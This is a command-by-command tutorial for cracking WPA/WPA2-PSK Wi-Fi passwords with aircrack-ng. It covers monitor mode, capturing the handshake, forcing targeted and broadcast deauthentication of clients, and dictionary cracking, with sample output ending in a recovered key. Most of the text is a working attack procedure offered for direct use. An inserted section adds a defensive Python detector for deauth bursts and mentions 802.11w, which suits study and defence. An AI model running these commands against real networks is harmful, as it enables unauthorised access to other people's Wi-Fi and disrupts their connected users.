
Crack Wi-Fi with WPA/WPA2-PSK using Aircrack-ng
This article is a summary of effective commands that just work.
With the help of these commands you will be able to crack WPA/WPA2 Wi-Fi Access Points which use PSK (Pre-Shared Key) encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack the PSK using aircrack-ng.
The full tutorial about WPA/WPA2 cracking can be found here.
Here are the basic steps we will be going through:
0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

0. Install the Latest Aircrack-ng
Install the required dependencies:

$ sudo apt-get install build-essential libssl-dev pkg-config

Download and install the latest aircrack-ng:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz
$ tar -xzf aircrack-ng-1.2-beta3.tar.gz
$ cd aircrack-ng-1.2-beta3
$ sudo make
$ sudo make install

Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

$ aircrack-ng --help | head -3
Aircrack-ng 1.2 beta3 r2393 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org

1. Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble:

$ sudo airmon-ng check kill

Start the wireless interface in monitor mode:

$ sudo airmon-ng start wlan0

Notice that airmon-ng enabled monitor-mode on mon0:

Interface   Chipset      Driver
wlan0       Intel 6235   iwlwifi - [phy0]
            (monitor mode enabled on mon0)

So, the correct interface name to use in later parts of the tutorial is mon0.

2. Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with the airodump-ng command:

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

 CH  1 ][ Elapsed: 20 s ][ 2013-05-29 12:36

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

 00:11:22:33:44:55  -38      212    1536   66   1  54e  WPA2  CCMP    PSK   CrackMe
 66:77:88:99:00:11  -63      133     335   33   1  54e  WPA2  CCMP    PSK   SomeAP

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -33   0 - 1    113      56
 00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78   0 - 1      0       1
 66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78   2 - 32     0       1

Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

Option                  Description
-c                      The channel for the wireless network
--bssid                 The MAC address of the access point
-w                      The file name prefix for the file which will contain authentication handshake
mon0                    The wireless interface
--ignore-negative-one   Removes 'fixed channel

Now wait until airodump-ng captures a handshake... or go to step #3 if you want to force this process.
After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.

 CH  1 ][ Elapsed: 20 s ][ 2013-05-29 12:36 ][ WPA handshake: 00:11:22:33:44:55

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

 00:11:22:33:44:55  -38      212    1536   66   1  54e  WPA2  CCMP    PSK   CrackMe

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -33   0 - 1    113      56

3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.

Send DeAuth to broadcast:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed DeAuth (attack is more effective when it is targeted):

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

Option                  Description
--deauth 100            The number of de-authenticate frames you want to send (0 for unlimited)
-a                      The MAC address of the access point
-c                      The MAC address of the client
mon0                    The wireless interface
--ignore-negative-one   Removes 'fixed channel

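From the defender's side, the deauthentication burst in this step is visible on the air. The following is an added example, not part of the original article: it counts deauth frames per BSSID in a sliding time window over constructed log records. The record format, window, threshold and function names are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_bursts(lines, window=5.0, threshold=20):
    """Flag BSSIDs that see >= threshold deauth frames within `window` seconds.

    Each record: "<epoch_seconds> <frame_subtype> <bssid> <destination>"
    (an assumed export format, not airodump-ng output).
    """
    recent = defaultdict(deque)   # bssid -> deauth timestamps still inside the window
    alerts = {}
    for line in lines:
        fields = line.split()
        if len(fields) != 4 or fields[1] != "deauth":
            continue              # skip malformed records and non-deauth frames
        ts, bssid, dst = float(fields[0]), fields[2].lower(), fields[3].lower()
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window: # expire frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            hit = alerts.setdefault(bssid, {"peak": 0, "targets": set()})
            hit["peak"] = max(hit["peak"], len(q))
            hit["targets"].add("broadcast" if dst == BROADCAST else dst)
    return alerts

def constructed_log():
    """Constructed sample traffic: ordinary frames plus one 100-frame burst."""
    log = ["10.00 beacon 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff",
           # a single deauth, such as a client leaving normally: must not alert
           "12.00 deauth 66:77:88:99:00:11 02:00:00:00:00:01",
           "garbled record"]
    # 100 deauth frames, 20 ms apart, aimed at one client of one AP
    log += [f"{20 + i * 0.02:.2f} deauth 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF"
            for i in range(100)]
    return log

if __name__ == "__main__":
    for bssid, hit in detect_deauth_bursts(constructed_log()).items():
        print(f"deauth burst on {bssid}: peak {hit['peak']} frames per window, "
              f"targets {sorted(hit['targets'])}")
```

Where clients support it, enabling 802.11w Protected Management Frames makes stations discard forged deauthentication frames, which removes the lever this step relies on.
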
4. Run Aircrack-ng to Crack WPA/WPA2-PSK
To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Option         Description
-w             The name of the dictionary file
-b             The MAC address of the access point
WPAcrack.cap   The name of the file that contains the authentication handshake

Aircrack-ng 1.2 beta3 r2393

[00:08:11] 538872 keys tested (1325.23 k/s)

KEY FOUND! [ 987654321 ]
